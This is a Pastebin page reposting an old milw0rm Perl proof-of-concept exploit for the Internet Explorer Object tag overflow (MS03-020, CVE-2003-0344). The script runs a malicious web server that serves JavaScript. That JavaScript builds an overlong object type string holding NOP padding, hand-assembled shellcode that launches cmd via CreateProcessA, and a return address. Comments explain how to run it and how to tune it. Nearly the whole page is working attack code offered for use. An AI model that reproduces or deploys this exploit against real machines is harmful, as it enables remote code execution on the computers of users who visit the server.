API tools faq
paste
Advertisement
FlyFar

Microsoft Internet Explorer - Object Tag (MS03-020) - CVE-2003-0344

FlyFar
Feb 2nd, 2024
1,465
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.21 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2.  
  3. #
  4. #  Proof of concept exploit on IE 5.x - 6.x by Alumni
  5. #  IE-Object longtype dynamic call oferflow
  6. #
  7. #  url://<$shellcode><'/'x48><jmp %ptr_sh>
  8. #  the flaw actually exists in URLMON.DLL when converting backslashes
  9. #  to wide char, this can be seen on stack dump near '&CLSID=AAA...2F__2F__...'.
  10. #  
  11. #  To exploit:  i)  start server perl script;
  12. #        ii) connect to http-service using IE/5.x.
  13. #                   a) the shellcode size is limited up to 56 bytes;
  14. #        b) the '$ret' may differ as well as the image base of KERNEL32.DLL;
  15. #        c) to avoid multiple encoding the shellcode is given 'as is' with help of JScript.
  16. #
  17.  
  18. use IO::Socket;
  19.  
  20. $port = 80;
  21. $server = IO::Socket::INET->new (LocalPort => $port,
  22.                 Type =>SOCK_STREAM,
  23.                 Reuse => 1,
  24.                 Listen => $port) or die("Couldnt't create
  25. server socket\n");
  26.  
  27.  
  28. $shellcode =    "\x33\xdb".     # xor ebx, ebx
  29.         "\x8b\xd4".     # mov edx, esp
  30.         "\x80\xc6\xff".     # add dh, 0xFF
  31.         "\xc7\x42\xfc\x63\x6d". # mov dword ptr[edx-4], 0x01646D63
  32. ("cmd\x01")
  33.         "\x64\x01".     #
  34.         "\x88\x5a\xff".     # mov byte ptr[edx-1], bl
  35.         "\x8d\x42\xfc".     # lea eax, [edx-4]
  36.         "\x8b\xf5".     # mov esi, ebp
  37.         "\x56\x52".     # push esi; push edx
  38.         "\x53\x53\x53\x53\x53\x53". # push ebx
  39.         "\x50\x53".     # push eax; push ebx
  40.         "\xb8\x41\x77\xf7\xbf". # mov eax, 0xBFF77741 ~=
  41. CreateProcessA
  42.         "\xff\xd0".     # call eax
  43.         "\xb8\xf8\xd4\xf8\xbf". # mov eax, 0xBFF8D4F8 ~=
  44. ExitProcess
  45.         "\xff\xd0".     # call eax
  46.         "\xcc";         # int 3
  47.  
  48. $nop = "\x90";
  49. $ret = "\\xAB\\x5D\\x58";
  50.  
  51.  
  52. while ($client = $server->accept()) {
  53.     while (<$client>) {
  54.         if ($_ =~ /^(\x0D\x0A)/) {
  55.  
  56. print $client <<END_DATA;
  57. HTTP/1.0 200 Ok\r
  58. Content-Type: text/html\r
  59. \r
  60. &lt;script&gt;\r
  61.     var mins = 56;\r
  62.     var size = 48;\r
  63.     var sploit = "$shellcode";\r
  64.     var strNop = "$nop";\r
  65.     var strObj = '&lt;object type="';\r
  66.     for (i=0;i<mins-sploit.length;i++) strObj += strNop;\r
  67.     strObj += sploit;\r
  68.     for (i=0;i<size;i++) strObj += '/';\r
  69.     strObj += "CCCCCCCCDDDDDDDD";\r
  70.     strObj += "$ret";\r
  71.     strObj += '">Hello&lt;/object&gt;';\r
  72.     alert(strObj);\r
  73.     document.write(strObj);\r
  74. &lt;/script&gt;\r
  75. END_DATA
  76.             close($client);
  77.  
  78.         }
  79.     }
  80. }
  81.  
  82. close($server);
  83.  
  84. # milw0rm.com [2003-06-07]
  85.            
Tags: Exploit CVE Vulnerability
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!